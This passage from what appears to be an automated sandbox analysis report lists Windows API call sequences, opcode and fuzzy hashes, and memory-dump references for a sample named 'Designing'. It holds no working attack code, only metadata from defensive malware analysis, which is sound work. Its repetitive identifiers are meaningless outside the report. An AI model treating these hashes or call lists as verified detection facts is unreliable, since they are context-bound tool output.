                                                                                                                                                                              • String ID: .lnk
                                                                                                                                                                              • API String ID: 3172280962-24824748
                                                                                                                                                                              • Opcode ID: 636c72fd1d926c769c84e0a5d5fc17694bdf3af89cc8eca69687f284f2f7f46f
                                                                                                                                                                              • Instruction ID: 6d2dbcacadbff7add59095e86a436c9a0989d15c415df754220a14e8f87daa68
                                                                                                                                                                              • Opcode Fuzzy Hash: 636c72fd1d926c769c84e0a5d5fc17694bdf3af89cc8eca69687f284f2f7f46f
                                                                                                                                                                              • Instruction Fuzzy Hash: 17D12471A042019FC714DF24C484A6ABBE5FF89714F14985DF895AB361CB32ED85CBA2
                                                                                                                                                                              APIs
                                                                                                                                                                              • GetLastError.KERNEL32(?,?,00DC36E9,00DC3355), ref: 00DC3700
                                                                                                                                                                              • ___vcrt_FlsGetValue.LIBVCRUNTIME ref: 00DC370E
                                                                                                                                                                              • ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 00DC3727
                                                                                                                                                                              • SetLastError.KERNEL32(00000000,?,00DC36E9,00DC3355), ref: 00DC3779
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 0000000C.00000002.2788924738.0000000000DA1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00DA0000, based on PE: true
                                                                                                                                                                              • Associated: 0000000C.00000002.2788896564.0000000000DA0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                              • Associated: 0000000C.00000002.2789012425.0000000000E3D000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                              • Associated: 0000000C.00000002.2789012425.0000000000E63000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                              • Associated: 0000000C.00000002.2789189706.0000000000E6D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                              • Associated: 0000000C.00000002.2789216037.0000000000E75000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_12_2_da0000_Designing.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: ErrorLastValue___vcrt_
                                                                                                                                                                              • String ID:
                                                                                                                                                                              • API String ID: 3852720340-0
                                                                                                                                                                              • Opcode ID: 3e00dd8c7a14da70171a5a8e74952cd973a84a9461ebf9998a23a48f2e524f1e
                                                                                                                                                                              • Instruction ID: 42523bfa7642a1d45f8076730f418d9f5d910b3840c60d3c3d86406ab7b58e29
                                                                                                                                                                              • Opcode Fuzzy Hash: 3e00dd8c7a14da70171a5a8e74952cd973a84a9461ebf9998a23a48f2e524f1e
                                                                                                                                                                              • Instruction Fuzzy Hash: 510124B2A5E3132EE66527B6BCD6F672A95EB057B1720422DF010930F0EF928D1656B0
                                                                                                                                                                              APIs
                                                                                                                                                                              • GetLastError.KERNEL32(?,00000000,00DC4D53,00000000,?,?,00DC68E2,?,?,00000000), ref: 00DD30EB
                                                                                                                                                                              • _free.LIBCMT ref: 00DD311E
                                                                                                                                                                              • _free.LIBCMT ref: 00DD3146
                                                                                                                                                                              • SetLastError.KERNEL32(00000000,?,00000000), ref: 00DD3153
                                                                                                                                                                              • SetLastError.KERNEL32(00000000,?,00000000), ref: 00DD315F
                                                                                                                                                                              • _abort.LIBCMT ref: 00DD3165
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 0000000C.00000002.2788924738.0000000000DA1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00DA0000, based on PE: true
                                                                                                                                                                              • Associated: 0000000C.00000002.2788896564.0000000000DA0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                              • Associated: 0000000C.00000002.2789012425.0000000000E3D000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                              • Associated: 0000000C.00000002.2789012425.0000000000E63000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                              • Associated: 0000000C.00000002.2789189706.0000000000E6D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                              • Associated: 0000000C.00000002.2789216037.0000000000E75000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_12_2_da0000_Designing.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: ErrorLast$_free$_abort
                                                                                                                                                                              • String ID:
                                                                                                                                                                              • API String ID: 3160817290-0
                                                                                                                                                                              • Opcode ID: addb2650fa462cc92dd00fe3379d6e8ff73dcfdfbc4da275c0182c9f748cb58d
                                                                                                                                                                              • Instruction ID: ad51ee295264643cfc93c307a8bf07d47bba6687bf19c9d411f35c617cdb067c
                                                                                                                                                                              • Opcode Fuzzy Hash: addb2650fa462cc92dd00fe3379d6e8ff73dcfdfbc4da275c0182c9f748cb58d
                                                                                                                                                                              • Instruction Fuzzy Hash: FEF0CD35A487022BC2126736BC0FB6F1666EFD1771B290417F918E23D1EE618E064173
                                                                                                                                                                              APIs
                                                                                                                                                                                • Part of subcall function 00DA1F2D: ExtCreatePen.GDI32(?,?,00000000,00000000,00000000,?,00000000), ref: 00DA1F87
                                                                                                                                                                                • Part of subcall function 00DA1F2D: SelectObject.GDI32(?,00000000), ref: 00DA1F96
                                                                                                                                                                                • Part of subcall function 00DA1F2D: BeginPath.GDI32(?), ref: 00DA1FAD
                                                                                                                                                                                • Part of subcall function 00DA1F2D: SelectObject.GDI32(?,00000000), ref: 00DA1FD6
                                                                                                                                                                              • MoveToEx.GDI32(?,-00000002,00000000,00000000), ref: 00E394AA
                                                                                                                                                                              • LineTo.GDI32(?,00000003,00000000), ref: 00E394BE
                                                                                                                                                                              • MoveToEx.GDI32(?,00000000,-00000002,00000000), ref: 00E394CC
                                                                                                                                                                              • LineTo.GDI32(?,00000000,00000003), ref: 00E394DC
                                                                                                                                                                              • EndPath.GDI32(?), ref: 00E394EC
                                                                                                                                                                              • StrokePath.GDI32(?), ref: 00E394FC
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 0000000C.00000002.2788924738.0000000000DA1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00DA0000, based on PE: true
                                                                                                                                                                              • Associated: 0000000C.00000002.2788896564.0000000000DA0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                              • Associated: 0000000C.00000002.2789012425.0000000000E3D000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                              • Associated: 0000000C.00000002.2789012425.0000000000E63000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                              • Associated: 0000000C.00000002.2789189706.0000000000E6D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                              • Associated: 0000000C.00000002.2789216037.0000000000E75000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_12_2_da0000_Designing.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: Path$LineMoveObjectSelect$BeginCreateStroke
                                                                                                                                                                              • String ID:
                                                                                                                                                                              • API String ID: 43455801-0
                                                                                                                                                                              • Opcode ID: b2cd4f3e85fd0d83db9d019d7fb42e64e3ba4a82a8b5763d001c42ee3184d50c
                                                                                                                                                                              • Instruction ID: 64be743d9937714501b7d8dfcd87ff720d8dbd24429a75f84cc3c250bfce4ce0
                                                                                                                                                                              • Opcode Fuzzy Hash: b2cd4f3e85fd0d83db9d019d7fb42e64e3ba4a82a8b5763d001c42ee3184d50c
                                                                                                                                                                              • Instruction Fuzzy Hash: EE111B7600410DBFDF029F91EC88E9A7F6DEF08364F048011BA196A161C7719D59DFA0
                                                                                                                                                                              APIs
                                                                                                                                                                              • GetDC.USER32(00000000), ref: 00E05B7C
                                                                                                                                                                              • GetDeviceCaps.GDI32(00000000,00000058), ref: 00E05B8D
                                                                                                                                                                              • GetDeviceCaps.GDI32(00000000,0000005A), ref: 00E05B94
                                                                                                                                                                              • ReleaseDC.USER32(00000000,00000000), ref: 00E05B9C
                                                                                                                                                                              • MulDiv.KERNEL32(000009EC,?,00000000), ref: 00E05BB3
                                                                                                                                                                              • MulDiv.KERNEL32(000009EC,00000001,?), ref: 00E05BC5
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 0000000C.00000002.2788924738.0000000000DA1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00DA0000, based on PE: true
                                                                                                                                                                              • Associated: 0000000C.00000002.2788896564.0000000000DA0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                              • Associated: 0000000C.00000002.2789012425.0000000000E3D000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                              • Associated: 0000000C.00000002.2789012425.0000000000E63000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                              • Associated: 0000000C.00000002.2789189706.0000000000E6D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                              • Associated: 0000000C.00000002.2789216037.0000000000E75000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_12_2_da0000_Designing.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: CapsDevice$Release
                                                                                                                                                                              • String ID:
                                                                                                                                                                              • API String ID: 1035833867-0
                                                                                                                                                                              • Opcode ID: f1bb4bd2a0107c7a14ec39227f29bbfb041570bc02b542281879b4c0882a0a2c
                                                                                                                                                                              • Instruction ID: fd2166a5d0482cc7a7e46dc63c5b74e7d8e29e7c5e7cc7238d01c41f61c69fad
                                                                                                                                                                              • Opcode Fuzzy Hash: f1bb4bd2a0107c7a14ec39227f29bbfb041570bc02b542281879b4c0882a0a2c
                                                                                                                                                                              • Instruction Fuzzy Hash: 37014475A04718BFEB109BA69C49F5E7FB9EB44751F004065FA05F7290D6709C14CFA0
                                                                                                                                                                              APIs
                                                                                                                                                                              • MapVirtualKeyW.USER32(0000005B,00000000), ref: 00DA32AF
                                                                                                                                                                              • MapVirtualKeyW.USER32(00000010,00000000), ref: 00DA32B7
                                                                                                                                                                              • MapVirtualKeyW.USER32(000000A0,00000000), ref: 00DA32C2
                                                                                                                                                                              • MapVirtualKeyW.USER32(000000A1,00000000), ref: 00DA32CD
                                                                                                                                                                              • MapVirtualKeyW.USER32(00000011,00000000), ref: 00DA32D5
                                                                                                                                                                              • MapVirtualKeyW.USER32(00000012,00000000), ref: 00DA32DD
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 0000000C.00000002.2788924738.0000000000DA1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00DA0000, based on PE: true
                                                                                                                                                                              • Associated: 0000000C.00000002.2788896564.0000000000DA0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                              • Associated: 0000000C.00000002.2789012425.0000000000E3D000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                              • Associated: 0000000C.00000002.2789012425.0000000000E63000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                              • Associated: 0000000C.00000002.2789189706.0000000000E6D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                              • Associated: 0000000C.00000002.2789216037.0000000000E75000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_12_2_da0000_Designing.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: Virtual
                                                                                                                                                                              • String ID:
                                                                                                                                                                              • API String ID: 4278518827-0
                                                                                                                                                                              • Opcode ID: 90098850e543f456708b52c910f0a6d38239a0d39b7e46b1fb987c998c07ff7c
                                                                                                                                                                              • Instruction ID: a778db06aaf81f3304a031385f4f7b87b039be18d6e6a10a4e23344df3e3c30e
                                                                                                                                                                              • Opcode Fuzzy Hash: 90098850e543f456708b52c910f0a6d38239a0d39b7e46b1fb987c998c07ff7c
                                                                                                                                                                              • Instruction Fuzzy Hash: BA016CB0901B597DE3008F5A8C85B52FFA8FF19354F00411B915C47941C7F5A864CBE5
                                                                                                                                                                              APIs
                                                                                                                                                                              • PostMessageW.USER32(?,00000010,00000000,00000000), ref: 00E0F447
                                                                                                                                                                              • SendMessageTimeoutW.USER32(?,00000010,00000000,00000000,00000002,000001F4,?), ref: 00E0F45D
                                                                                                                                                                              • GetWindowThreadProcessId.USER32(?,?), ref: 00E0F46C
                                                                                                                                                                              • OpenProcess.KERNEL32(001F0FFF,00000000,?,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 00E0F47B
                                                                                                                                                                              • TerminateProcess.KERNEL32(00000000,00000000,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 00E0F485
                                                                                                                                                                              • CloseHandle.KERNEL32(00000000,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 00E0F48C
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 0000000C.00000002.2788924738.0000000000DA1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00DA0000, based on PE: true
                                                                                                                                                                              • Associated: 0000000C.00000002.2788896564.0000000000DA0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                              • Associated: 0000000C.00000002.2789012425.0000000000E3D000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                              • Associated: 0000000C.00000002.2789012425.0000000000E63000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                              • Associated: 0000000C.00000002.2789189706.0000000000E6D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                              • Associated: 0000000C.00000002.2789216037.0000000000E75000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_12_2_da0000_Designing.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: Process$Message$CloseHandleOpenPostSendTerminateThreadTimeoutWindow
                                                                                                                                                                              • String ID:
                                                                                                                                                                              • API String ID: 839392675-0
                                                                                                                                                                              • Opcode ID: 374f110fc5483562bc9b1dd0de7c3bb4403a09db36d4cef275cbaa99f39bd7f3
                                                                                                                                                                              • Instruction ID: f87731c0dd19426fe1166a884eb1fae151b202bb13746e33db956ac7a166f99e
                                                                                                                                                                              • Opcode Fuzzy Hash: 374f110fc5483562bc9b1dd0de7c3bb4403a09db36d4cef275cbaa99f39bd7f3
                                                                                                                                                                              • Instruction Fuzzy Hash: 32F0177224515CBFE7215B63AC0EEEB3E7CEBC6B11F000059FA11E209097A06A45D6B5
                                                                                                                                                                              APIs
                                                                                                                                                                              • GetClientRect.USER32(?), ref: 00DE34EF
                                                                                                                                                                              • SendMessageW.USER32(?,00001328,00000000,?), ref: 00DE3506
                                                                                                                                                                              • GetWindowDC.USER32(?), ref: 00DE3512
                                                                                                                                                                              • GetPixel.GDI32(00000000,?,?), ref: 00DE3521
                                                                                                                                                                              • ReleaseDC.USER32(?,00000000), ref: 00DE3533
                                                                                                                                                                              • GetSysColor.USER32(00000005), ref: 00DE354D
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 0000000C.00000002.2788924738.0000000000DA1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00DA0000, based on PE: true
                                                                                                                                                                              • Associated: 0000000C.00000002.2788896564.0000000000DA0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                              • Associated: 0000000C.00000002.2789012425.0000000000E3D000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                              • Associated: 0000000C.00000002.2789012425.0000000000E63000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                              • Associated: 0000000C.00000002.2789189706.0000000000E6D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                              • Associated: 0000000C.00000002.2789216037.0000000000E75000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_12_2_da0000_Designing.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: ClientColorMessagePixelRectReleaseSendWindow
                                                                                                                                                                              • String ID:
                                                                                                                                                                              • API String ID: 272304278-0
                                                                                                                                                                              • Opcode ID: b93a9dfa871bf5d9b86540b92e0960778b337dc15191858f965219bd653df47c
                                                                                                                                                                              • Instruction ID: e9ae3010b04d6e81a75c368f212e3c7fdc5e562008c313fdf7d0e50af3fd0dc2
                                                                                                                                                                              • Opcode Fuzzy Hash: b93a9dfa871bf5d9b86540b92e0960778b337dc15191858f965219bd653df47c
                                                                                                                                                                              • Instruction Fuzzy Hash: 69014B31504209FFDB516F66EC0DBF97FB1FB04321F550560FA2AA22A0CB315E55AB10
                                                                                                                                                                              APIs
                                                                                                                                                                              • WaitForSingleObject.KERNEL32(?,000000FF), ref: 00E021CC
                                                                                                                                                                              • UnloadUserProfile.USERENV(?,?), ref: 00E021D8
                                                                                                                                                                              • CloseHandle.KERNEL32(?), ref: 00E021E1
                                                                                                                                                                              • CloseHandle.KERNEL32(?), ref: 00E021E9
                                                                                                                                                                              • GetProcessHeap.KERNEL32(00000000,?), ref: 00E021F2
                                                                                                                                                                              • HeapFree.KERNEL32(00000000), ref: 00E021F9
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 0000000C.00000002.2788924738.0000000000DA1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00DA0000, based on PE: true
                                                                                                                                                                              • Associated: 0000000C.00000002.2788896564.0000000000DA0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                              • Associated: 0000000C.00000002.2789012425.0000000000E3D000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                              • Associated: 0000000C.00000002.2789012425.0000000000E63000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                              • Associated: 0000000C.00000002.2789189706.0000000000E6D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                              • Associated: 0000000C.00000002.2789216037.0000000000E75000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_12_2_da0000_Designing.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: CloseHandleHeap$FreeObjectProcessProfileSingleUnloadUserWait
                                                                                                                                                                              • String ID:
                                                                                                                                                                              • API String ID: 146765662-0
                                                                                                                                                                              • Opcode ID: 71894c2dfd9480b88a85235999fe544f7b2603466cd7948baaaa0d50c9aac245
                                                                                                                                                                              • Instruction ID: b65695fe9496dd353b1a83995f3f060cb28a7e586a2055fee2436f4fa97c78aa
                                                                                                                                                                              • Opcode Fuzzy Hash: 71894c2dfd9480b88a85235999fe544f7b2603466cd7948baaaa0d50c9aac245
                                                                                                                                                                              • Instruction Fuzzy Hash: D8E0E576008109BFDB011FA2FC0C94ABF39FF49322B114221F225E2070CB329834DB50
                                                                                                                                                                              APIs
                                                                                                                                                                              • ShellExecuteExW.SHELL32(0000003C), ref: 00E2B903
                                                                                                                                                                                • Part of subcall function 00DA41EA: _wcslen.LIBCMT ref: 00DA41EF
                                                                                                                                                                              • GetProcessId.KERNEL32(00000000), ref: 00E2B998
                                                                                                                                                                              • CloseHandle.KERNEL32(00000000), ref: 00E2B9C7
                                                                                                                                                                              Strings
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 0000000C.00000002.2788924738.0000000000DA1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00DA0000, based on PE: true
                                                                                                                                                                              • Associated: 0000000C.00000002.2788896564.0000000000DA0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                              • Associated: 0000000C.00000002.2789012425.0000000000E3D000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                              • Associated: 0000000C.00000002.2789012425.0000000000E63000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                              • Associated: 0000000C.00000002.2789189706.0000000000E6D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                              • Associated: 0000000C.00000002.2789216037.0000000000E75000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_12_2_da0000_Designing.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: CloseExecuteHandleProcessShell_wcslen
                                                                                                                                                                              • String ID: <$@
                                                                                                                                                                              • API String ID: 146682121-1426351568
                                                                                                                                                                              • Opcode ID: e323843a5d0a5e47ba848e4d4de8de5dc9d481eaf06e407c33da1f783c1ef6b4
                                                                                                                                                                              • Instruction ID: 89787345ad20694a28b19972cb336d8d203d2e70ef14720bb993a7f565c16393
                                                                                                                                                                              • Opcode Fuzzy Hash: e323843a5d0a5e47ba848e4d4de8de5dc9d481eaf06e407c33da1f783c1ef6b4
                                                                                                                                                                              • Instruction Fuzzy Hash: 0D718C74A00225DFCB14EF54D494A9EBBF4FF08314F048499E85AAB352CB71EE45CBA0
                                                                                                                                                                              APIs
                                                                                                                                                                              • GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 00E348D1
                                                                                                                                                                              • IsMenu.USER32(?), ref: 00E348E6
                                                                                                                                                                              • InsertMenuItemW.USER32(?,?,00000001,00000030), ref: 00E3492E
                                                                                                                                                                              • DrawMenuBar.USER32 ref: 00E34941
                                                                                                                                                                              Strings
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 0000000C.00000002.2788924738.0000000000DA1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00DA0000, based on PE: true
                                                                                                                                                                              • Associated: 0000000C.00000002.2788896564.0000000000DA0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                              • Associated: 0000000C.00000002.2789012425.0000000000E3D000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                              • Associated: 0000000C.00000002.2789012425.0000000000E63000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                              • Associated: 0000000C.00000002.2789189706.0000000000E6D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                              • Associated: 0000000C.00000002.2789216037.0000000000E75000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_12_2_da0000_Designing.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: Menu$Item$DrawInfoInsert
                                                                                                                                                                              • String ID: 0
                                                                                                                                                                              • API String ID: 3076010158-4108050209
                                                                                                                                                                              • Opcode ID: 33a9452cab65e12914ce5f73038ab18626d4b36ede13a494b692f7d7d6d9c1c0
                                                                                                                                                                              • Instruction ID: 95ff8d5ada32d0111438d1ba0e6f5880d416184aaae2560f7a3929205d95f42c
                                                                                                                                                                              • Opcode Fuzzy Hash: 33a9452cab65e12914ce5f73038ab18626d4b36ede13a494b692f7d7d6d9c1c0
                                                                                                                                                                              • Instruction Fuzzy Hash: 6D414CB5A0024AEFDB10CF51D888EAABBB5FF45328F045119F945A7390C730AD54CB60
                                                                                                                                                                              APIs
                                                                                                                                                                                • Part of subcall function 00DAB329: _wcslen.LIBCMT ref: 00DAB333
                                                                                                                                                                                • Part of subcall function 00E045FD: GetClassNameW.USER32(?,?,000000FF), ref: 00E04620
                                                                                                                                                                              • SendMessageW.USER32(?,00000188,00000000,00000000), ref: 00E027B3
                                                                                                                                                                              • SendMessageW.USER32(?,0000018A,00000000,00000000), ref: 00E027C6
                                                                                                                                                                              • SendMessageW.USER32(?,00000189,?,00000000), ref: 00E027F6
                                                                                                                                                                                • Part of subcall function 00DA8577: _wcslen.LIBCMT ref: 00DA858A
                                                                                                                                                                              Strings
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 0000000C.00000002.2788924738.0000000000DA1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00DA0000, based on PE: true
                                                                                                                                                                              • Associated: 0000000C.00000002.2788896564.0000000000DA0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                              • Associated: 0000000C.00000002.2789012425.0000000000E3D000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                              • Associated: 0000000C.00000002.2789012425.0000000000E63000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                              • Associated: 0000000C.00000002.2789189706.0000000000E6D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                              • Associated: 0000000C.00000002.2789216037.0000000000E75000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_12_2_da0000_Designing.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: MessageSend$_wcslen$ClassName
                                                                                                                                                                              • String ID: ComboBox$ListBox
                                                                                                                                                                              • API String ID: 2081771294-1403004172
                                                                                                                                                                              • Opcode ID: bd0c50bb8ac4fde91bf5b569810e410ad676148bec27b6827d928b306175d46d
                                                                                                                                                                              • Instruction ID: fbe7c32368847a66f1360b2cb0fade89df5d9726273971ff3930453d070e7fff
                                                                                                                                                                              • Opcode Fuzzy Hash: bd0c50bb8ac4fde91bf5b569810e410ad676148bec27b6827d928b306175d46d
                                                                                                                                                                              • Instruction Fuzzy Hash: B3213775900104BFDB09AB60DC49DFEBBB8DF56364B04912EF512B31E1CB38494A9670
                                                                                                                                                                              APIs
                                                                                                                                                                              • SendMessageW.USER32(00000000,00000467,00000000,?), ref: 00E33A29
                                                                                                                                                                              • LoadLibraryW.KERNEL32(?), ref: 00E33A30
                                                                                                                                                                              • SendMessageW.USER32(?,00000467,00000000,00000000), ref: 00E33A45
                                                                                                                                                                              • DestroyWindow.USER32(?), ref: 00E33A4D
                                                                                                                                                                              Strings
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 0000000C.00000002.2788924738.0000000000DA1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00DA0000, based on PE: true
                                                                                                                                                                              • Associated: 0000000C.00000002.2788896564.0000000000DA0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                              • Associated: 0000000C.00000002.2789012425.0000000000E3D000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                              • Associated: 0000000C.00000002.2789012425.0000000000E63000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                              • Associated: 0000000C.00000002.2789189706.0000000000E6D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                              • Associated: 0000000C.00000002.2789216037.0000000000E75000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_12_2_da0000_Designing.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: MessageSend$DestroyLibraryLoadWindow
                                                                                                                                                                              • String ID: SysAnimate32
                                                                                                                                                                              • API String ID: 3529120543-1011021900
                                                                                                                                                                              • Opcode ID: 5e20c2bceb8247dd13459d280034ea0325c9ad579e8ea6ebec10c46400629ded
                                                                                                                                                                              • Instruction ID: dca80a9de56945b64f7c5887580f47ec40198dc7466fe200899a964fa91a455e
                                                                                                                                                                              • Opcode Fuzzy Hash: 5e20c2bceb8247dd13459d280034ea0325c9ad579e8ea6ebec10c46400629ded
                                                                                                                                                                              • Instruction Fuzzy Hash: 61219D71600209AFEB109F74EC89FAB7BE9EB85368F106218FA91A21A0C771CD40D760
                                                                                                                                                                              APIs
                                                                                                                                                                                • Part of subcall function 00DA249F: GetWindowLongW.USER32(00000000,000000EB), ref: 00DA24B0
                                                                                                                                                                              • GetCursorPos.USER32(?), ref: 00E39A5D
                                                                                                                                                                              • TrackPopupMenuEx.USER32(?,00000000,?,?,?,00000000), ref: 00E39A72
                                                                                                                                                                              • GetCursorPos.USER32(?), ref: 00E39ABA
                                                                                                                                                                              • DefDlgProcW.USER32(?,0000007B,?,?,?,?), ref: 00E39AF0
                                                                                                                                                                              Strings
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 0000000C.00000002.2788924738.0000000000DA1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00DA0000, based on PE: true
                                                                                                                                                                              • Associated: 0000000C.00000002.2788896564.0000000000DA0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                              • Associated: 0000000C.00000002.2789012425.0000000000E3D000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                              • Associated: 0000000C.00000002.2789012425.0000000000E63000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                              • Associated: 0000000C.00000002.2789189706.0000000000E6D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                              • Associated: 0000000C.00000002.2789216037.0000000000E75000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_12_2_da0000_Designing.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: Cursor$LongMenuPopupProcTrackWindow
                                                                                                                                                                              • String ID: (
                                                                                                                                                                              • API String ID: 2864067406-2063206799
                                                                                                                                                                              • Opcode ID: b7290c6e50f7337ebcad9dacf4efb55d99eb4ec26bab39b73d5ca8607e39d1e2
